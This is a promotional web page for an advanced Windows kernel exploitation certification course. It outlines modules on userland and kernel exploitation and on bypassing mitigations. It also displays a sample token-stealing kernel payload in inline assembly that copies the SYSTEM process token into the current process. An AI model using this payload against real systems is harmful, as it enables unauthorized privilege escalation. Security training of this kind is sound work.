Certified Windows Research & Exploitation

Go beyond user mode. Learn how to reverse engineer, debug, and exploit the Windows Kernel directly from industry experts.

Start Learning Now Course Overview

Course Overview

The Certified Windows Research & Exploitation (CWRE) is an advanced certification designed for security researchers who want to master the Windows Kernel.

You will start by understanding the Windows internals, moving to advanced userland exploitation, and finally diving deep into the kernel (ring 0).

  • 100+ Hours of Content
  • Private Discord Community
  • 30+ Hands-on Kernel Labs
  • Lifetime Access & Updates
  • 1 exam voucher included for the CWRE exam
exploit.c - vim
// Windows Kernel Exploitation Payload
#include <windows.h>
 
void TokenStealingPayload() {
// Hyper-optimized assembly for token stealing
__asm {
push rax
mov  rax, gs:[188h]   ; CurrentThread (_KTHREAD)
mov  rax, [rax+0xB8]  ; ApcState.Process (_EPROCESS)
mov  rcx, rax          ; Store Current Process
 
__loop:
mov  rax, [rax+0x448] ; ActiveProcessLinks
sub  rax, 0x448
cmp  [rax+0x440], 4  ; UniqueProcessId == 4 (SYSTEM)
jne  __loop
 
mov  rdx, [rax+0x4B8] ; Get SYSTEM Token
mov  [rcx+0x4B8], rdx ; Replace our Token
pop  rax
}
}

Deep Dive Curriculum

Module 1

Advanced Windows Userland Exploitation

  • PE file format deep dive: headers, sections, imports, exports
  • PE loader internals and DLL loading mechanisms
  • PEB and TEB structures in exploitation
  • Windows memory layout and address space organization
  • Advanced stack buffer overflow & Stack pivoting
  • ROP: advanced chain construction, automated gadget discovery
  • JOP and COP (Jump/Call Oriented Programming)
  • SEH and SafeSEH exploitation on legacy/modern targets
  • Windows Heap Manager: NT Heap, LFH, Segment Heap
  • Heap spraying and grooming techniques
  • Use-after-free & Type confusion vulnerabilities
  • Mitigation Bypasses: DEP, ASLR, CFG, CET, ACG, CIG
Module 2

Windows Kernel Exploitation

  • NT kernel design: HAL, Executive, Object Manager, Memory Manager
  • System call mechanism: syscall/sysenter, SSDT
  • Kernel memory layout: Paged/Non-paged pools
  • Key Structures: EPROCESS, ETHREAD, TOKEN, OBJECT_HEADER
  • Token-based access control & Integrity Levels
  • Windows Driver Model (WDM) & KMDF overview
  • IOCTL fuzzing & DeviceIoControl interaction
  • Vulnerability classes: Stack/Heap overflow, Arbitrary R/W, Race conditions
  • Pool Exploitation: Legacy & Modern Segment Pool (Win 21H2+)
  • Arbitrary Read/Write primitives construction
  • Token Stealing & Privilege Escalation
  • Data-only attacks (No Code Exec) & BYOVD methodology
  • Win32k exploitation: GDI and USER object abuse
Module 3

Advanced Mitigations & Modern Bypass

  • kCFG: Kernel Control Flow Guard analysis & bypass
  • kCET: Kernel Shadow Stack impact
  • SMEP & SMAP bypass techniques
  • VBS (Virtualization Based Security) architecture
  • HVCI (Hypervisor-Protected Code Integrity) restrictions
  • Credential Guard & VTL 0/1 isolation
  • Exploitation in VBS/HVCI environments (Data-only attacks)
  • Attacking the Hypervisor: Theoretical attack surface
  • Windows Defender Exploit Guard & ASR rules
  • XFG (eXtended Flow Guard) & KDP (Kernel Data Protection)
  • Secure Launch (DRTM) & Measured Boot
  • Browser-to-kernel & Office-to-kernel chains
  • Full Chain Development: Access -> Sandbox Escape -> Kernel -> System
Bonus Content

Living Curriculum - Added Monthly

  • New exploit techniques as they are discovered (0-days analysis)
  • Hyper-V research and virtualization escapes
  • Windows Kernel Fuzzing methodologies (w/ Syzkaller & customized fuzzers)
  • Reverse Engineering hidden kernel components

Lifetime updates included with certification.